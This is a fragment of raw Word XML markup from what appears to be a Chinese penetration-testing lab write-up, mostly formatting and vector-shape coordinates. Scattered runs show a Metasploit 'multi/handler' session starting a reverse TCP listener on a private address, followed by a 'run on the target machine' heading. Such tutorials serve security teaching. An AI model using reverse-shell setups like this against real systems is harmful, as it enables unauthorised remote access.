          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>target: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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="16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Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7582" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="24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Wildcard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="21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Target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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>23</w:t>
      </w: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-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5421" w:firstLine="0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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5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msf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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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exploit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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="3860" w:firstLine="0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27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]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Started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reverse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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TCP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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on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980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>28</w:t>
      </w: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372" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：</w:t>
      </w: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ict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:174.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3497" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3497;width:82;height:322" coordorigin="1177,3497" coordsize="82,322" path="m1217,3506l1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3506,1217,3507,1217,3507,1217,3507,1217,3507,1217,3507,1217,3508,1217,3508,1217,3508,1217,3509,1217,3509,1217,3509,1217,3510,1217,3510,1217,3511,1217,3511,1217,3512,1217,3512,1217,3513,1217,3513,1217,3514,1217,3515,1217,3516,1217,3516,1217,3517,1217,3518,1217,3519,1217,3520,1217,3521,1217,3522,1217,3523,1217,3524,1217,3525,1217,3527,1217,3528,1217,3529,1217,3531,1217,3532,1217,3534,1217,3535,1217,3537,1217,3539,1217,3541,1217,3542,1217,3544,1217,3546,1217,3548,1217,3550,1217,3552,1217,3555,1217,3557,1217,3559,1217,3562,1217,3564,1217,3567,1217,3570,1217,3572,1217,3575,1217,3578,1217,3581,1217,3584,1217,3587,1217,3590,1217,3594,1217,3597,1217,3600,1217,3604,1217,3608,1217,3611,1217,3615,1217,3619,1217,3623,1217,3627,1217,3631,1217,3636,1217,3640,1217,3644,1217,3649,1217,3654,1217,3658,1217,3663,1217,3668,1217,3673,1217,3679,1217,3684,1217,3689,1217,3695,1217,3700,1217,3706,1217,3712,1217,3718,1217,3724,1217,3730,1217,3736,1217,3743,1217,3749,1217,3756,1217,3763,1217,3770,1217,3777,1217,3784,1217,3791,1217,3798,1217,3806e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:518.874pt;margin-top:340.874pt;width:1.125pt;height:232.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10377,6817" coordsize="22,4642">
        <v:shape style="position:absolute;left:10377;top:6817;width:22;height:4642" coordorigin="10377,6817" coordsize="22,4642" path="m10402,6837l10402,6837,10402,6837,10402,6837,10402,6838,10402,6838,10402,6838,10402,6838,10402,6838,10402,6839,10402,6839,10402,6840,10402,6841,10402,6842,10402,6843,10402,6845,10402,6847,10402,6849,10402,6851,10402,6853,10402,6856,10402,6859,10402,6863,10402,6867,10402,6871,10402,6875,10402,6880,10402,6886,10402,6891,10402,6898,10402,6904,10402,6912,10402,6919,10402,6927,10402,6936,10402,6945,10402,6955,10402,6965,10402,6976,10402,6988,10402,7000,10402,7013,10402,7026,10402,7041,10402,7056,10402,7071,10402,7087,10402,7104,10402,7122,10402,7141,10402,7160,10402,7180,10402,7201,10402,7223,10402,7246,10402,7269,10402,7294,10402,7319,10402,7345,10402,7373,10402,7401,10402,7430,10402,7460,10402,7491,10402,7523,10402,7556,10402,7591,10402,7626,10402,7662,10402,7700,10402,7739,10402,7778,10402,7819,10402,7861,10402,7905,10402,7949,10402,7995,10402,8042,10402,8090,10402,8139,10402,8190,10402,8242,10402,8295,10402,8350,10402,8406,10402,8463,10402,8522,10402,8582,10402,8644,10402,8707,10402,8771,10402,8837,10402,8904,10402,8973,10402,9044,10402,9116,10402,9189,10402,9264,10402,9341,10402,9419,10402,9499,10402,9580,10402,9664,10402,9748,10402,9835,10402,9923,10402,10013,10402,10104,10402,10198,10402,10293,10402,10390,10402,10488,10402,10589,10402,10691,10402,10795,10402,10901,10402,11009,10402,11119,10402,11231,10402,11344,10402,11460e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:339.874pt;width:450.125pt;height:21.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,6797" coordsize="9002,422">
        <v:shape style="position:absolute;left:1477;top:6797;width:9002;height:422" coordorigin="1477,6797" coordsize="9002,422" path="m1510,6837l1510,6837,1510,6837,1510,6837,1510,6837,1510,6837,1510,6837,1511,6837,1512,6837,1512,6837,1514,6837,1515,6837,1517,6837,1519,6837,1521,6837,1524,6837,1528,6837,1532,6837,1536,6837,1541,6837,1546,6837,1552,6837,1559,6837,1566,6837,1575,6837,1583,6837,1593,6837,1603,6837,1615,6837,1627,6837,1640,6837,1654,6837,1668,6837,1684,6837,1701,6837,1719,6837,1738,6837,1758,6837,1780,6837,1802,6837,1826,6837,1851,6837,1877,6837,1904,6837,1933,6837,1963,6837,1995,6837,2028,6837,2063,6837,2099,6837,2136,6837,2175,6837,2216,6837,2259,6837,2303,6837,2348,6837,2396,6837,2445,6837,2496,6837,2549,6837,2604,6837,2660,6837,2719,6837,2779,6837,2841,6837,2906,6837,2972,6837,3041,6837,3112,6837,3184,6837,3259,6837,3336,6837,3416,6837,3498,6837,3582,6837,3668,6837,3757,6837,3848,6837,3941,6837,4037,6837,4136,6837,4236,6837,4340,6837,4446,6837,4555,6837,4666,6837,4780,6837,4897,6837,5017,6837,5139,6837,5264,6837,5392,6837,5523,6837,5657,6837,5793,6837,5933,6837,6076,6837,6222,6837,6370,6837,6522,6837,6677,6837,6835,6837,6997,6837,7161,6837,7329,6837,7500,6837,7675,6837,7853,6837,8034,6837,8219,6837,8407,6837,8598,6837,8793,6837,8992,6837,9194,6837,9400,6837,9609,6837,9823,6837,10039,6837,10260,6837,10484,6837,10484,6837,10484,6837,10484,6837,10484,6837,10484,6837,10484,6837,10484,6837,10484,6838,10484,6838,10484,6838,10484,6838,10484,6838,10484,6838,10484,6838,10484,6838,10484,6838,10484,6838,10484,6839,10484,6839,10484,6839,10484,6839,10484,6840,10484,6840,10484,6840,10484,6841,10484,6841,10484,6842,10484,6842,10484,6843,10484,6843,10484,6844,10484,6844,10484,6845,10484,6846,10484,6847,10484,6847,10484,6848,10484,6849,10484,6850,10484,6851,10484,6852,10484,6853,10484,6855,10484,6856,10484,6857,10484,6859,10484,6860,10484,6861,10484,6863,10484,6865,10484,6866,10484,6868,10484,6870,10484,6872,10484,6874,10484,6876,10484,6878,10484,6880,10484,6883,10484,6885,10484,6887,10484,6890,10484,6893,10484,6895,10484,6898,10484,6901,10484,6904,10484,6907,10484,6910,10484,6914,10484,6917,10484,6920,10484,6924,10484,6928,10484,6931,10484,6935,10484,6939,10484,6943,10484,6947,10484,6952,10484,6956,10484,6960,10484,6965,10484,6970,10484,6975,10484,6980,10484,6985,10484,6990,10484,6995,10484,7001,10484,7006,10484,7012,10484,7018,10484,7024,10484,7030,10484,7036,10484,7042,10484,7049,10484,7055,10484,7062,10484,7069,10484,7076,10484,7083,10484,7090,10484,7098,10484,7105,10484,7113,10484,7121,10484,7129,10484,7137,10484,7146,10484,7154,10484,7163,10484,7172,10484,7180,10484,7190,10484,7199,10484,7208,10484,7218,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10483,7228,10482,7228,10482,7228,10480,7228,10479,7228,10477,7228,10475,7228,10473,7228,10470,7228,10466,7228,10462,7228,10458,7228,10453,7228,10448,7228,10442,7228,10435,7228,10428,7228,10419,7228,10411,7228,10401,7228,10391,7228,10379,7228,10367,7228,10354,7228,10340,7228,10326,7228,10310,7228,10293,7228,10275,7228,10256,7228,10236,7228,10215,7228,10192,7228,10168,7228,10143,7228,10117,7228,10090,7228,10061,7228,10031,7228,9999,7228,9966,7228,9931,7228,9895,7228,9858,7228,9819,7228,9778,7228,9735,7228,9691,7228,9646,7228,9598,7228,9549,7228,9498,7228,9445,7228,9391,7228,9334,7228,9275,7228,9215,7228,9153,7228,9088,7228,9022,7228,8953,7228,8883,7228,8810,7228,8735,7228,8658,7228,8578,7228,8497,7228,8413,7228,8326,7228,8238,7228,8146,7228,8053,7228,7957,7228,7859,7228,7758,7228,7654,7228,7548,7228,7439,7228,7328,7228,7214,7228,7097,7228,6977,7228,6855,7228,6730,7228,6602,7228,6471,7228,6337,7228,6201,7228,6061,7228,5918,7228,5773,7228,5624,7228,5472,7228,5317,7228,5159,7228,4997,7228,4833,7228,4665,7228,4494,7228,4319,7228,4141,7228,3960,7228,3776,7228,3587,7228,3396,7228,3201,7228,3002,7228,2800,7228,2594,7228,2385,7228,2172,7228,1955,7228,1734,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7227,1510,7227,1510,7227,1510,7227,1510,7227,1510,7227,1510,7227,1510,7227,1510,7227,1510,7226,1510,7226,1510,7226,1510,7225,1510,7225,1510,7225,1510,7224,1510,7224,1510,7224,1510,7223,1510,7223,1510,7222,1510,7221,1510,7221,1510,7220,1510,7219,1510,7219,1510,7218,1510,7217,1510,7216,1510,7215,1510,7214,1510,7213,1510,7212,1510,7210,1510,7209,1510,7208,1510,7207,1510,7205,1510,7204,1510,7202,1510,7200,1510,7199,1510,7197,1510,7195,1510,7193,1510,7191,1510,7189,1510,7187,1510,7185,1510,7182,1510,7180,1510,7178,1510,7175,1510,7172,1510,7170,1510,7167,1510,7164,1510,7161,1510,7158,1510,7155,1510,7152,1510,7148,1510,7145,1510,7141,1510,7138,1510,7134,1510,7130,1510,7126,1510,7122,1510,7118,1510,7113,1510,7109,1510,7105,1510,7100,1510,7095,1510,7090,1510,7085,1510,7080,1510,7075,1510,7070,1510,7064,1510,7059,1510,7053,1510,7047,1510,7041,1510,7035,1510,7029,1510,7023,1510,7016,1510,7010,1510,7003,1510,6996,1510,6989,1510,6982,1510,6975,1510,6967,1510,6960,1510,6952,1510,6944,1510,6936,1510,6928,1510,6919,1510,6911,1510,6902,1510,6894,1510,6885,1510,6875,1510,6866,1510,6857,1510,6847,1510,6837e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:340.800pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:359.874pt;width:450.125pt;height:17.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,7197" coordsize="9002,342">
        <v:shape style="position:absolute;left:1477;top:7197;width:9002;height:342" coordorigin="1477,7197" coordsize="9002,342" path="m1510,7228l1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1510,7228,1511,7228,1512,7228,1512,7228,1514,7228,1515,7228,1517,7228,1519,7228,1521,7228,1524,7228,1528,7228,1532,7228,1536,7228,1541,7228,1546,7228,1552,7228,1559,7228,1566,7228,1575,7228,1583,7228,1593,7228,1603,7228,1615,7228,1627,7228,1640,7228,1654,7228,1668,7228,1684,7228,1701,7228,1719,7228,1738,7228,1758,7228,1780,7228,1802,7228,1826,7228,1851,7228,1877,7228,1904,7228,1933,7228,1963,7228,1995,7228,2028,7228,2063,7228,2099,7228,2136,7228,2175,7228,2216,7228,2259,7228,2303,7228,2348,7228,2396,7228,2445,7228,2496,7228,2549,7228,2604,7228,2660,7228,2719,7228,2779,7228,2841,7228,2906,7228,2972,7228,3041,7228,3112,7228,3184,7228,3259,7228,3336,7228,3416,7228,3498,7228,3582,7228,3668,7228,3757,7228,3848,7228,3941,7228,4037,7228,4136,7228,4236,7228,4340,7228,4446,7228,4555,7228,4666,7228,4780,7228,4897,7228,5017,7228,5139,7228,5264,7228,5392,7228,5523,7228,5657,7228,5793,7228,5933,7228,6076,7228,6222,7228,6370,7228,6522,7228,6677,7228,6835,7228,6997,7228,7161,7228,7329,7228,7500,7228,7675,7228,7853,7228,8034,7228,8219,7228,8407,7228,8598,7228,8793,7228,8992,7228,9194,7228,9400,7228,9609,7228,9823,7228,10039,7228,10260,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7228,10484,7229,10484,7229,10484,7229,10484,7229,10484,7229,10484,7230,10484,7230,10484,7230,10484,7231,10484,7231,10484,7231,10484,7232,10484,7232,10484,7233,10484,7233,10484,7234,10484,7235,10484,7235,10484,7236,10484,7237,10484,7238,10484,7238,10484,7239,10484,7240,10484,7241,10484,7242,10484,7243,10484,7244,10484,7245,10484,7247,10484,7248,10484,7249,10484,7251,10484,7252,10484,7254,10484,7255,10484,7257,10484,7258,10484,7260,10484,7262,10484,7264,10484,7266,10484,7268,10484,7270,10484,7272,10484,7274,10484,7277,10484,7279,10484,7281,10484,7284,10484,7287,10484,7289,10484,7292,10484,7295,10484,7298,10484,7301,10484,7304,10484,7307,10484,7310,10484,7314,10484,7317,10484,7321,10484,7324,10484,7328,10484,7332,10484,7336,10484,7340,10484,7344,10484,7348,10484,7352,10484,7357,10484,7361,10484,7366,10484,7370,10484,7375,10484,7380,10484,7385,10484,7390,10484,7396,10484,7401,10484,7406,10484,7412,10484,7418,10484,7424,10484,7430,10484,7436,10484,7442,10484,7448,10484,7454,10484,7461,10484,7468,10484,7474,10484,7481,10484,7488,10484,7496,10484,7503,10484,7510,10484,7518,10484,7526,10484,7533,10484,7541,10484,7550,10484,7558,10484,7558,10484,7558,10484,7558,10484,7558,10484,7558,10484,7558,10483,7558,10482,7558,10482,7558,10480,7558,10479,7558,10477,7558,10475,7558,10473,7558,10470,7558,10466,7558,10462,7558,10458,7558,10453,7558,10448,7558,10442,7558,10435,7558,10428,7558,10419,7558,10411,7558,10401,7558,10391,7558,10379,7558,10367,7558,10354,7558,10340,7558,10326,7558,10310,7558,10293,7558,10275,7558,10256,7558,10236,7558,10215,7558,10192,7558,10168,7558,10143,7558,10117,7558,10090,7558,10061,7558,10031,7558,9999,7558,9966,7558,9931,7558,9895,7558,9858,7558,9819,7558,9778,7558,9735,7558,9691,7558,9646,7558,9598,7558,9549,7558,9498,7558,9445,7558,9391,7558,9334,7558,9275,7558,9215,7558,9153,7558,9088,7558,9022,7558,8953,7558,8883,7558,8810,7558,8735,7558,8658,7558,8578,7558,8497,7558,8413,7558,8326,7558,8238,7558,8146,7558,8053,7558,7957,7558,7859,7558,7758,7558,7654,7558,7548,7558,7439,7558,7328,7558,7214,7558,7097,7558,6977,7558,6855,7558,6730,7558,6602,7558,6471,7558,6337,7558,6201,7558,6061,7558,5918,7558,5773,7558,5624,7558,5472,7558,5317,7558,5159,7558,4997,7558,4833,7558,4665,7558,4494,7558,4319,7558,4141,7558,3960,7558,3776,7558,3587,7558,3396,7558,3201,7558,3002,7558,2800,7558,2594,7558,2385,7558,2172,7558,1955,7558,1734,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7558,1510,7557,1510,7557,1510,7557,1510,7557,1510,7557,1510,7557,1510,7557,1510,7556,1510,7556,1510,7556,1510,7556,1510,7555,1510,7555,1510,7555,1510,7554,1510,7554,1510,7554,1510,7553,1510,7553,1510,7552,1510,7551,1510,7551,1510,7550,1510,7549,1510,7549,1510,7548,1510,7547,1510,7546,1510,7545,1510,7544,1510,7543,1510,7542,1510,7541,1510,7540,1510,7539,1510,7537,1510,7536,1510,7535,1510,7533,1510,7532,1510,7530,1510,7529,1510,7527,1510,7525,1510,7523,1510,7522,1510,7520,1510,7518,1510,7515,1510,7513,1510,7511,1510,7509,1510,7506,1510,7504,1510,7501,1510,7499,1510,7496,1510,7493,1510,7491,1510,7488,1510,7485,1510,7482,1510,7478,1510,7475,1510,7472,1510,7468,1510,7465,1510,7461,1510,7457,1510,7454,1510,7450,1510,7446,1510,7442,1510,7437,1510,7433,1510,7429,1510,7424,1510,7420,1510,7415,1510,7410,1510,7405,1510,7400,1510,7395,1510,7390,1510,7384,1510,7379,1510,7373,1510,7368,1510,7362,1510,7356,1510,7350,1510,7344,1510,7337,1510,7331,1510,7324,1510,7318,1510,7311,1510,7304,1510,7297,1510,7290,1510,7283,1510,7275,1510,7268,1510,7260,1510,7252,1510,7244,1510,7236,1510,7228e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:359.874pt;width:2.125pt;height:18.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,7197" coordsize="42,362">
